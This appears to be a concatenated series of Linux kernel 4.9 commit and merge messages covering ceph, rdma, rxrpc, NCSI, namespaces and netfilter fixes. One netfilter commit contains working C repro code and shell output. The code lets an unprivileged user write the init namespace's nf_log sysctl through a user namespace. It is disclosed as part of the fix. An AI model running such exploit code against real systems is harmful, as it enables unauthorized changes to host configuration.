-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2
iQEcBAABCAAGBQJX+PjZAAoJEEp/3jgCEfOLVuoH/RwtFLIb6/KZUYtBOrVVrTun
kReRlfq2xKYrGGtyQEqSuz7fBdwT1LVCVcL8kC4GFD4R67o+tNMAr6PfM/7pZABj
HRoRLgSZ9FLw4W5n0VpBIznih75QUbCdXiTCtH9eorMHU5q1YpTvVHHlF9W9Pm2I
eNGnBWpGyHVeiK66mpUCH+EQKQ4GkAVD9rneTNqLHgq2yotHkVl1j258+DL6JRGs
OBoh3RmNQaGOAS37Lss8erCSusAGEcAeGV6ubuK2lFUKyR41EkD3I0xkhNSPe+CD
RifFcpVziIeTu//cLgl0nnHGtmUytD7HgJubaPthArKIOen9ZDAfEkgI0o+JI2A=
=45O7
-----END PGP SIGNATURE-----
Merge tag 'ceph-for-4.9-rc1' of git://github.com/ceph/ceph-client
Pull Ceph updates from Ilya Dryomov:
"The big ticket item here is support for rbd exclusive-lock feature,
with maintenance operations offloaded to userspace (Douglas Fuller,
Mike Christie and myself). Another block device bullet is a series
fixing up layering error paths (myself).
On the filesystem side, we've got patches that improve our handling of
buffered vs dio write races (Neil Brown) and a few assorted fixes from
Zheng. Also included a couple of random cleanups and a minor CRUSH
update"
* tag 'ceph-for-4.9-rc1' of git://github.com/ceph/ceph-client: (39 commits)
crush: remove redundant local variable
crush: don't normalize input of crush_ln iteratively
libceph: ceph_build_auth() doesn't need ceph_auth_build_hello()
libceph: use CEPH_AUTH_UNKNOWN in ceph_auth_build_hello()
ceph: fix description for rsize and rasize mount options
rbd: use kmalloc_array() in rbd_header_from_disk()
ceph: use list_move instead of list_del/list_add
ceph: handle CEPH_SESSION_REJECT message
ceph: avoid accessing / when mounting a subpath
ceph: fix mandatory flock check
ceph: remove warning when ceph_releasepage() is called on dirty page
ceph: ignore error from invalidate_inode_pages2_range() in direct write
ceph: fix error handling of start_read()
rbd: add rbd_obj_request_error() helper
rbd: img_data requests don't own their page array
rbd: don't call rbd_osd_req_format_read() for !img_data requests
rbd: rework rbd_img_obj_exists_submit() error paths
rbd: don't crash or leak on errors in rbd_img_obj_parent_read_full_callback()
rbd: move bumping img_request refcount into rbd_obj_request_submit()
rbd: mark the original request as done if stat request fails
...
- Updates to mlx5
- Updates to mlx4 (two conflicts, both minor and easily resolved)
- Updates to iw_cxgb4 (one conflict, not so obvious to resolve, proper
resolution is to keep the code in cxgb4_main.c as it is in Linus'
tree as attach_uld was refactored and moved into cxgb4_uld.c)
- Improvements to uAPI (moved vendor specific API elements to uAPI area)
- Add hns-roce driver and hns and hns-roce ACPI reset support
- Conversion of all rdma code away from deprecated
create_singlethread_workqueue
- Security improvement: remove unsafe ib_get_dma_mr (breaks lustre in
staging)
-----BEGIN PGP SIGNATURE-----
iQIcBAABAgAGBQJX+AwSAAoJELgmozMOVy/d0WkQAKxPzVccMWwHv28iZI4ey13u
JwE+VoCNpCAZAVuEgzK5zzFdNHPvAk2jU93H4apA7dfXJBXPatVuj9Lnk+ieEEnW
tbFwJjBpbQ3Zol3+SPfAHnsVMbtax+xmd6WDKExPXXEDl1L6rutwL3KKfmgWEitg
ysX7XOJCiSdyM0hcg4T6UPB9a3jGPff9NLu0oGamV+yoUk5Y0WGoVFxHZ4MKcw8t
OkFBYIxGz4SGwq2tulStuH03HteURX594KngtrA8dyq6l1R2GlGRv+bkJAUEIWUv
aA0ow3VWusOM6fT+jLXPCv8iUwIXM8tR/U6F7X+cmORUUtWvCl+uCUVid113j/aN
BK+Af2nJnfoJ5cDBPsD+bC76l5gQycNZO/Qh8op2kmgJtD+6OpGM3cBXsHx53+kk
0wloJ2lKCGShWxNj+ig8n8rR/rhhs/x3vV3ouCVWNMbOUgOSN3eYHxmK3wGFW4nd
Qx+WYCjj9Yi/J6nmUDcfEQ4NWPR22Q2+0ENAabfhLhV6mDloAO5ILHd4GDqC3IA9
UtxlVjf4ZonaiLnTQQzCnDMGVVk6tT8FJ9D42s0ScwjbdYwjyCW9/rs/g2EhcprR
Cc+AmjqLviCWGtzBSFO0SijqQon8lcQOwdLw61CdFFvPa/mlLdf1rbx9ArIyNVKn
JSrbr3CGyoqyYj6qaEO5
=LC+S
-----END PGP SIGNATURE-----
Merge tag 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dledford/rdma
Pull main rdma updates from Doug Ledford:
"This is the main pull request for the rdma stack this release. The
code has been through 0day and I had it tagged for linux-next testing
for a couple days.
Summary:
- updates to mlx5
- updates to mlx4 (two conflicts, both minor and easily resolved)
- updates to iw_cxgb4 (one conflict, not so obvious to resolve,
proper resolution is to keep the code in cxgb4_main.c as it is in
Linus' tree as attach_uld was refactored and moved into
cxgb4_uld.c)
- improvements to uAPI (moved vendor specific API elements to uAPI
area)
- add hns-roce driver and hns and hns-roce ACPI reset support
- conversion of all rdma code away from deprecated
create_singlethread_workqueue
- security improvement: remove unsafe ib_get_dma_mr (breaks lustre in
staging)"
* tag 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dledford/rdma: (75 commits)
staging/lustre: Disable InfiniBand support
iw_cxgb4: add fast-path for small REG_MR operations
cxgb4: advertise support for FR_NSMR_TPTE_WR
IB/core: correctly handle rdma_rw_init_mrs() failure
IB/srp: Fix infinite loop when FMR sg[0].offset != 0
IB/srp: Remove an unused argument
IB/core: Improve ib_map_mr_sg() documentation
IB/mlx4: Fix possible vl/sl field mismatch in LRH header in QP1 packets
IB/mthca: Move user vendor structures
IB/nes: Move user vendor structures
IB/ocrdma: Move user vendor structures
IB/mlx4: Move user vendor structures
IB/cxgb4: Move user vendor structures
IB/cxgb3: Move user vendor structures
IB/mlx5: Move and decouple user vendor structures
IB/{core,hw}: Add constant for node_desc
ipoib: Make ipoib_warn ratelimited
IB/mlx4/alias_GUID: Remove deprecated create_singlethread_workqueue
IB/ipoib_verbs: Remove deprecated create_singlethread_workqueue
IB/ipoib: Remove deprecated create_singlethread_workqueue
...
Johan Hedberg says:
====================
pull request: bluetooth 2016-10-08
Here are a couple of Bluetooth fixes for the 4.9 kernel:
- Firmware download fix for Atheros controllers
- Fixes to the content of LE scan response
- New USB ID for a Marvell chipset
Please let me know if there are any issues pulling. Thanks.
====================
Signed-off-by: David S. Miller <davem@davemloft.net>
Merge updates from Andrew Morton:
- fsnotify updates
- ocfs2 updates
- all of MM
* emailed patches from Andrew Morton <akpm@linux-foundation.org>: (127 commits)
console: don't prefer first registered if DT specifies stdout-path
cred: simpler, 1D supplementary groups
CREDITS: update Pavel's information, add GPG key, remove snail mail address
mailmap: add Johan Hovold
.gitattributes: set git diff driver for C source code files
uprobes: remove function declarations from arch/{mips,s390}
spelling.txt: "modeled" is spelt correctly
nmi_backtrace: generate one-line reports for idle cpus
arch/tile: adopt the new nmi_backtrace framework
nmi_backtrace: do a local dump_stack() instead of a self-NMI
nmi_backtrace: add more trigger_*_cpu_backtrace() methods
min/max: remove sparse warnings when they're nested
Documentation/filesystems/proc.txt: add more description for maps/smaps
mm, proc: fix region lost in /proc/self/smaps
proc: fix timerslack_ns CAP_SYS_NICE check when adjusting self
proc: add LSM hook checks to /proc/<tid>/timerslack_ns
proc: relax /proc/<tid>/timerslack_ns capability requirements
meminfo: break apart a very long seq_printf with #ifdefs
seq/proc: modify seq_put_decimal_[u]ll to take a const char *, not char
proc: faster /proc/*/status
...
This disallows setting /proc/sys/net/ipv6/conf/*/router_solicitations
to values below -1.
-1 continues to mean an unlimited number of retransmits.
Note: this depends on 'ipv6 addrconf: remove addrconf_sysctl_hop_limit()'
Signed-off-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
These inode operations are no longer used; remove them.
Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
Current supplementary groups code can massively overallocate memory and
is implemented in a way so that access to individual gid is done via 2D
array.
If number of gids is <= 32, memory allocation is more or less tolerable
(140/148 bytes). But if it is not, code allocates full page (!)
regardless and, what's even more fun, doesn't reuse small 32-entry
array.
2D array means dependent shifts, loads and LEAs without possibility to
optimize them (gid is never known at compile time).
All of the above is unnecessary. Switch to the usual
trailing-zero-len-array scheme. Memory is allocated with
kmalloc/vmalloc() and only as much as needed. Accesses become simpler
(LEA 8(gi,idx,4) or even without displacement).
Maximum number of gids is 65536 which translates to 256KB+8 bytes. I
think kernel can handle such allocation.
On my usual desktop system with whole 9 (nine) aux groups, struct
group_info shrinks from 148 bytes to 44 bytes, yay!
Nice side effects:
- "gi->gid[i]" is shorter than "GROUP_AT(gi, i)", less typing,
- fix little mess in net/ipv4/ping.c
should have been using GROUP_AT macro but this point becomes moot,
- aux group allocation is persistent and should be accounted as such.
Link: http://lkml.kernel.org/r/20160817201927.GA2096@p183.telecom.by
Signed-off-by: Alexey Dobriyan <adobriyan@gmail.com>
Cc: Vasily Kulikov <segoon@openwall.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
The cgroup core and the memory controller need to track socket ownership
for different purposes, but the tracking sites being entirely different
is kind of ugly.
Be a better citizen and rename the memory controller callbacks to match
the cgroup core callbacks, then move them to the same place.
[akpm@linux-foundation.org: coding-style fixes]
Link: http://lkml.kernel.org/r/20160914194846.11153-3-hannes@cmpxchg.org
Signed-off-by: Johannes Weiner <hannes@cmpxchg.org>
Acked-by: Tejun Heo <tj@kernel.org>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: Michal Hocko <mhocko@suse.cz>
Cc: Vladimir Davydov <vdavydov@virtuozzo.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Pull VFS splice updates from Al Viro:
"There's a bunch of branches this cycle, both mine and from other folks
and I'd rather send pull requests separately.
This one is the conversion of ->splice_read() to ITER_PIPE iov_iter
(and introduction of such). Gets rid of a lot of code in fs/splice.c
and elsewhere; there will be followups, but these are for the next
cycle... Some pipe/splice-related cleanups from Miklos in the same
branch as well"
* 'work.splice_read' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs:
pipe: fix comment in pipe_buf_operations
pipe: add pipe_buf_steal() helper
pipe: add pipe_buf_confirm() helper
pipe: add pipe_buf_release() helper
pipe: add pipe_buf_get() helper
relay: simplify relay_file_read()
switch default_file_splice_read() to use of pipe-backed iov_iter
switch generic_file_splice_read() to use of ->read_iter()
new iov_iter flavour: pipe-backed
fuse_dev_splice_read(): switch to add_to_pipe()
skb_splice_bits(): get rid of callback
new helper: add_to_pipe()
splice: lift pipe_lock out of splice_to_pipe()
splice: switch get_iovec_page_array() to iov_iter
splice_to_pipe(): don't open-code wakeup_pipe_readers()
consistent treatment of EFAULT on O_DIRECT read/write
If we allow pseudo-filesystems created with mount_pseudo to have xattr
handlers, we can replace sockfs_getxattr with a sockfs_xattr_get handler
to use the xattr handler name parsing.
Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
The standard return value for unsupported attribute names is
-EOPNOTSUPP, as opposed to undefined but supported attributes
(-ENODATA).
Also, fail for attribute names like "system.sockprotonameXXX" and
simplify the code a bit.
Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
-----BEGIN PGP SIGNATURE-----
iQIVAwUAV/YbX/Sw1s6N8H32AQLwDg//W0fGt3OSFrOpEQHtKUSCWO3m4RRJgn/m
Xbaz8ZO6Z8qmdkM267yrLCAp5hx0E77WP46l7V3B9p9wX0vA+P2QO7K5Kis6sNaY
aceCCAKHqvUSiZa8tQ2aGpbxxa8qICbjHjiCg0lFABiGDWGRnIBNW8qV5LyGKZkI
7b3i9MGBkGLdZxetcJd498j6Gck9cuqOZDnfqgb0Q5pAtsjVM3EZXXsHO1ZD5WHG
GUieQgY9Tp0rlVKjlLdR94fW/acMZYs0c5RO1uzGAoUeBALnSUS5+bSRSlGp1KOM
C7r5/dK4FvkZY+xuS5pLXoI8WpsA4EDpBINGdO6L03wTJ10zx5y5CdTTl7G6Y53R
BpmY8SDFmWYqpJs+gZiWYIlbnBQ+b0Mu7p7rKeSJS/q0+YEVwJlz3UFo2k1O+J3A
ovpxP5E6IvOjlKF21Zs1hOR2m/sfR42v/TfwpApImSeY2k2m8vzyfXBJP4ClAk29
PGYOOqMLYwzIjLwdapDxL3ccjKvOwYeClCs1t6bKva2XCrF1ybtBnAQDxFp6KzXi
p/y/QkHnseSeYct8mElDopRekbwoqa9YPwXn7lagvQhNxqNGIR4HT82IeohI/Dqe
GtQbjSPc3uebk5lRf535kTZixu+l5/yKQeuRTsfoIgsMjVlMdqS9dUAphzI4IXLp
FE0q49uLTVI=
=+Jr3
-----END PGP SIGNATURE-----
Merge tag 'rxrpc-rewrite-20161004' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs
David Howells says:
====================
rxrpc: Fixes
This set of patches contains a bunch of fixes:
(1) Fix an oops on incoming call to a local endpoint without a bound
service.
(2) Only ping for a lost reply in a client call (this is inapplicable to
service calls).
(3) Fix maybe uninitialised variable warnings in the ACK/ABORT sending
function by splitting it.
(4) Fix loss of PING RESPONSE ACKs due to them being subsumed by PING ACK
generation.
(5) OpenAFS improperly terminates calls it makes as a client under some
circumstances by not fully hard-ACK'ing the last DATA packets. This
is alleviated by a new call appearing on the same channel implicitly
completing the previous call on that channel. Handle this implicit
completion.
(6) Properly handle expiry of service calls due to the aforementioned
improper termination with no follow up call to implicitly complete it:
(a) The call's background processor needs to be queued to complete the
call, send an abort and notify the socket.
(b) The call's background processor needs to notify the socket (or the
kernel service) when it has completed the call.
(c) A negative error code must thence be returned to the kernel
service so that it knows the call died.
(d) The AFS filesystem must detect the fatal error and end the call.
(7) Must produce a DELAY ACK when the actual service operation takes a
while to process and must cancel the ACK when the reply is ready.
(8) Don't request an ACK on the last DATA packet of the Tx phase as this
confuses OpenAFS.
====================
Signed-off-by: David S. Miller <davem@davemloft.net>
Since linux-3.15, netlink_dump() can use up to 16384 bytes skb
allocations.
Due to struct skb_shared_info ~320 bytes overhead, we end up using
order-3 (on x86) page allocations, that might trigger direct reclaim and
add stress.
The intent was really to attempt a large allocation but immediately
fallback to a smaller one (order-1 on x86) in case of memory stress.
On recent kernels (linux-4.4), we can remove __GFP_DIRECT_RECLAIM to
meet the goal. Old kernels would need to remove __GFP_WAIT
While we are at it, since we do an order-3 allocation, allow to use
all the allocated bytes instead of 16384 to reduce syscalls during
large dumps.
iproute2 already uses 32KB recvmsg() buffer sizes.
Alexei provided an initial patch downsizing to SKB_WITH_OVERHEAD(16384)
Fixes: 9063e21fb0 ("netlink: autosize skb lengthes")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Alexei Starovoitov <ast@kernel.org>
Cc: Greg Thelen <gthelen@google.com>
Reviewed-by: Greg Rose <grose@lightfleet.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
If a socket has FANOUT sockopt set, a new proto_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
registered as part of fanout_add is not removed. Call fanout_release, on a
NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
fanout_list.
This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()
Signed-off-by: Anoob Soman <anoob.soman@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Pull namespace updates from Eric Biederman:
"This set of changes is a number of smaller things that have been
overlooked in other development cycles focused on more fundamental
change. The devpts changes are small things that were a distraction
until we managed to kill off DEVPTS_MULTPLE_INSTANCES. There is an
trivial regression fix to autofs for the unprivileged mount changes
that went in last cycle. A pair of ioctls has been added by Andrey
Vagin making it is possible to discover the relationships between
namespaces when referring to them through file descriptors.
The big user visible change is starting to add simple resource limits
to catch programs that misbehave. With namespaces in general and user
namespaces in particular allowing users to use more kinds of
resources, it has become important to have something to limit errant
programs. Because the purpose of these limits is to catch errant
programs the code needs to be inexpensive to use as it always on, and
the default limits need to be high enough that well behaved programs
on well behaved systems don't encounter them.
To this end, after some review I have implemented per user per user
namespace limits, and use them to limit the number of namespaces. The
limits being per user mean that one user can not exhause the limits of
another user. The limits being per user namespace allow contexts where
the limit is 0 and security conscious folks can remove from their
threat anlysis the code used to manage namespaces (as they have
historically done as it root only). At the same time the limits being
per user namespace allow other parts of the system to use namespaces.
Namespaces are increasingly being used in application sand boxing
scenarios so an all or nothing disable for the entire system for the
security conscious folks makes increasing use of these sandboxes
impossible.
There is also added a limit on the maximum number of mounts present in
a single mount namespace. It is nontrivial to guess what a reasonable
system wide limit on the number of mount structure in the kernel would
be, especially as it various based on how a system is using
containers. A limit on the number of mounts in a mount namespace
however is much easier to understand and set. In most cases in
practice only about 1000 mounts are used. Given that some autofs
scenarious have the potential to be 30,000 to 50,000 mounts I have set
the default limit for the number of mounts at 100,000 which is well
above every known set of users but low enough that the mount hash
tables don't degrade unreaonsably.
These limits are a start. I expect this estabilishes a pattern that
other limits for resources that namespaces use will follow. There has
been interest in making inotify event limits per user per user
namespace as well as interest expressed in making details about what
is going on in the kernel more visible"
* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/ebiederm/user-namespace: (28 commits)
autofs: Fix automounts by using current_real_cred()->uid
mnt: Add a per mount namespace limit on the number of mounts
netns: move {inc,dec}_net_namespaces into #ifdef
nsfs: Simplify __ns_get_path
tools/testing: add a test to check nsfs ioctl-s
nsfs: add ioctl to get a parent namespace
nsfs: add ioctl to get an owning user namespace for ns file descriptor
kernel: add a helper to get an owning user namespace for a namespace
devpts: Change the owner of /dev/pts/ptmx to the mounter of /dev/pts
devpts: Remove sync_filesystems
devpts: Make devpts_kill_sb safe if fsi is NULL
devpts: Simplify devpts_mount by using mount_nodev
devpts: Move the creation of /dev/pts/ptmx into fill_super
devpts: Move parse_mount_options into fill_super
userns: When the per user per user namespace limit is reached return ENOSPC
userns; Document per user per user namespace limits.
mntns: Add a limit on the number of mount namespaces.
netns: Add a limit on the number of net namespaces
cgroupns: Add a limit on the number of cgroup namespaces
ipcns: Add a limit on the number of ipc namespaces
...
Use eir_append_data to remove code duplication.
Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Add appearance value to beginning of scan rsp data for
default advertising instance if the value is not 0.
Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Use complete name if it fits. If not and there is short name
check if it fits. If not then use shortened name as prefix
of complete name.
Signed-off-by: Michał Narajowski <michal.narajowski@codecoup.pl>
Signed-off-by: Marcel Holtmann <marcel@holtmann.org>
Don't request an ACK on the last DATA packet of a call's Tx phase as for a
client there will be a reply packet or some sort of ACK to shift phase. If
the ACK is requested, OpenAFS sends a REQUESTED-ACK ACK with soft-ACKs in
it and doesn't follow up with a hard-ACK.
If we don't set the flag, OpenAFS will send a DELAY ACK that hard-ACKs the
reply data, thereby allowing the call to terminate cleanly.
Signed-off-by: David Howells <dhowells@redhat.com>
We need to generate a DELAY ACK from the service end of an operation if we
start doing the actual operation work and it takes longer than expected.
This will hard-ACK the request data and allow the client to release its
resources.
To make this work:
(1) We have to set the ack timer and propose an ACK when the call moves to
the RXRPC_CALL_SERVER_ACK_REQUEST and clear the pending ACK and cancel
the timer when we start transmitting the reply (the first DATA packet
of the reply implicitly ACKs the request phase).
(2) It must be possible to set the timer when the caller is holding
call->state_lock, so split the lock-getting part of the timer function
out.
(3) Add trace notes for the ACK we're requesting and the timer we clear.
Signed-off-by: David Howells <dhowells@redhat.com>
In rxrpc_kernel_recv_data(), when we return the error number incurred by a
failed call, we must negate it before returning it as it's stored as
positive (that's what we have to pass back to userspace).
Signed-off-by: David Howells <dhowells@redhat.com>
The call's background processor work item needs to notify the socket when
it completes a call so that recvmsg() or the AFS fs can deal with it.
Without this, call expiry isn't handled.
Signed-off-by: David Howells <dhowells@redhat.com>
When a call expires, it must be queued for the background processor to deal
with otherwise a service call that is improperly terminated will just sit
there awaiting an ACK and won't expire.
Signed-off-by: David Howells <dhowells@redhat.com>
OpenAFS doesn't always correctly terminate client calls that it makes -
this includes calls the OpenAFS servers make to the cache manager service.
It should end the client call with either:
(1) An ACK that has firstPacket set to one greater than the seq number of
the reply DATA packet with the LAST_PACKET flag set (thereby
hard-ACK'ing all packets). nAcks should be 0 and acks[] should be
empty (ie. no soft-ACKs).
(2) An ACKALL packet.
OpenAFS, though, may send an ACK packet with firstPacket set to the last
seq number or less and soft-ACKs listed for all packets up to and including
the last DATA packet.
The transmitter, however, is obliged to keep the call live and the
soft-ACK'd DATA packets around until they're hard-ACK'd as the receiver is
permitted to drop any merely soft-ACK'd packet and request retransmission
by sending an ACK packet with a NACK in it.
Further, OpenAFS will also terminate a client call by beginning the next
client call on the same connection channel. This implicitly completes the
previous call.
This patch handles implicit ACK of a call on a channel by the reception of
the first packet of the next call on that channel.
If another call doesn't come along to implicitly ACK a call, then we have
to time the call out. There are some bugs there that will be addressed in
subsequent patches.
Signed-off-by: David Howells <dhowells@redhat.com>
Separate the output of PING ACKs from the output of other sorts of ACK so
that if we receive a PING ACK and schedule transmission of a PING RESPONSE
ACK, the response doesn't get cancelled by a PING ACK we happen to be
scheduling transmission of at the same time.
If a PING RESPONSE gets lost, the other side might just sit there waiting
for it and refuse to proceed otherwise.
Signed-off-by: David Howells <dhowells@redhat.com>
Split rxrpc_send_data_packet() to separate ACK generation (which is more
complicated) from ABORT generation. This simplifies the code a bit and
fixes the following warning:
In file included from ../net/rxrpc/output.c:20:0:
net/rxrpc/output.c: In function 'rxrpc_send_call_packet':
net/rxrpc/ar-internal.h:1187:27: error: 'top' may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/rxrpc/output.c:103:24: note: 'top' was declared here
net/rxrpc/output.c:225:25: error: 'hard_ack' may be used uninitialized in this function [-Werror=maybe-uninitialized]
Reported-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: David Howells <dhowells@redhat.com>
When a reply is deemed lost, we send a ping to find out the other end
received all the request data packets we sent. This should be limited to
client calls and we shouldn't do this on service calls.
Signed-off-by: David Howells <dhowells@redhat.com>
If an call comes in to a local endpoint that isn't listening for any
incoming calls at the moment, an oops will happen. We need to check that
the local endpoint's service pointer isn't NULL before we dereference it.
Signed-off-by: David Howells <dhowells@redhat.com>
struct rxrpc_local->service is marked __rcu - this means that accesses of
it need to be managed using RCU wrappers. There are two such places in
rxrpc_release_sock() where the value is checked and cleared. Fix this by
using the appropriate wrappers.
Signed-off-by: David Howells <dhowells@redhat.com>
Pablo Neira Ayuso says:
====================
Netfilter fixes for net-next
This is a pull request to address fallout from previous nf-next pull
request, only fixes going on here:
1) Address a potential null dereference in nf_unregister_net_hook()
when becomes nf_hook_entry_head is NULL, from Aaron Conole.
2) Missing ifdef for CONFIG_NETFILTER_INGRESS, also from Aaron.
3) Fix linking problems in xt_hashlimit in x86_32, from Pai.
4) Fix permissions of nf_log sysctl from unpriviledge netns, from
Jann Horn.
5) Fix possible divide by zero in nft_limit, from Liping Zhang.
====================
Signed-off-by: David S. Miller <davem@davemloft.net>
Use __builtin_clz() supported by GCC and Clang to figure out
how many bits we should shift instead of shifting by a bit
in a loop until the value gets normalized. Improves performance
of this function by up to 3x in worst-case scenario and overall
straw2 performance by ~10%.
Reflects ceph.git commit 110de33ca497d94fc4737e5154d3fe781fa84a0a.
Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
Resolve the merge conflict between Felix's/my and Toke's patches
coming into the tree through net and mac80211-next respectively.
Most of Felix's changes go away due to Toke's new infrastructure
work, my patch changes to "goto begin" (the label wasn't there
before) instead of returning NULL so flow control towards drivers
is preserved better.
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;
void writefile(char *path, char *buf) {
int fd = open(path, O_WRONLY);
if (fd == -1)
err(1, "unable to open thing");
if (write(fd, buf, strlen(buf)) != strlen(buf))
err(1, "unable to write thing");
close(fd);
}
int child_fn(void *p_) {
if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
NULL))
err(1, "mount");
/* Yes, we need to set the maps for the net sysctls to recognize us
* as namespace root.
*/
char buf[1000];
sprintf(buf, "0 %d 1\n", (int)outer_uid);
writefile("/proc/1/uid_map", buf);
writefile("/proc/1/setgroups", "deny");
sprintf(buf, "0 %d 1\n", (int)outer_gid);
writefile("/proc/1/gid_map", buf);
stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
if (stolen_fd == -1)
err(1, "open nf_log");
return 0;
}
int main(void) {
outer_uid = getuid();
outer_gid = getgid();
int child = clone(child_fn, child_stack + sizeof(child_stack),
CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
|CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
if (child == -1)
err(1, "clone");
int status;
if (wait(&status) != child)
err(1, "wait");
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
errx(1, "child exit status bad");
char *data = "NONE";
if (write(stolen_fd, data, strlen(data)) != strlen(data))
err(1, "write");
return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
This introduces ncsi_stop_dev(), as counterpart to ncsi_start_dev(),
to stop the NCSI device so that it can be reenabled in future. This
API should be called when the network device driver is going to
shutdown the device. There are 3 things done in the function: Stop
the channel monitoring; Reset channels to inactive state; Report
NCSI link down.
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
The original NCSI channel monitoring was implemented based on a
backoff algorithm: the GLS response should be received in the
specified interval. Otherwise, the channel is regarded as dead
and failover should be taken if current channel is an active one.
There are several problems in the implementation: (A) On BCM5718,
we found when the IID (Instance ID) in the GLS command packet
changes from 255 to 1, the response corresponding to IID#1 never
comes in. It means we cannot make the unfair judgement that the
channel is dead when one response is missed. (B) The code's
readability should be improved. (C) We should do failover when
current channel is active one and the channel monitoring should
be marked as disabled before doing failover.
This reworks the channel monitoring to address all above issues.
The fields for channel monitoring is put into separate struct
and the state of channel monitoring is predefined. The channel
is regarded alive if the network controller responses to one of
two GLS commands or both of them in 5 seconds.
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
There is only one NCSI request property for now: the response for
the sent command need drive the workqueue or not. So we had one
field (@driven) for the purpose. We lost the flexibility to extend
NCSI request properties.
This replaces @driven with @flags and @req_flags in NCSI request
and NCSI command argument struct. Each bit of the newly introduced
field can be used for one property. No functional changes introduced.
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
The NCSI request index (struct ncsi_request::id) is put into instance
ID (IID) field while sending NCSI command packet. It was designed the
available IDs are given in round-robin fashion. @ndp->request_id was
introduced to represent the next available ID, but it has been used
as number of successively allocated IDs. It breaks the round-robin
design. Besides, we shouldn't put 0 to NCSI command packet's IID
field, meaning ID#0 should be reserved according section 6.3.1.1
in NCSI spec (v1.1.0).
This fixes above two issues. With it applied, the available IDs will
be assigned in round-robin fashion and ID#0 won't be assigned.
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
We needn't send CIS (Clear Initial State) command to the NCSI
reserved channel (0x1f) in the enumeration. We shouldn't receive
a valid response from CIS on NCSI channel 0x1f.
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
This defines NCSI_RESERVED_CHANNEL as the reserved NCSI channel
ID (0x1f). No logical changes introduced.
Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
xchg() is used to set NCSI channel's state in order for consistent
access to the state. xchg()'s return value should be used. Otherwise,
one build warning will be raised (with -Wunused-value) as below message
indicates. It is reported by ia64-linux-gcc (GCC) 4.9.0.
net/ncsi/ncsi-manage.c: In function 'ncsi_channel_monitor':
arch/ia64/include/uapi/asm/cmpxchg.h:56:2: warning: value computed is \
not used [-Wunused-value]
((__typeof__(*(ptr))) __xchg((unsigned long) (x), (ptr), sizeof(*(ptr))))
^
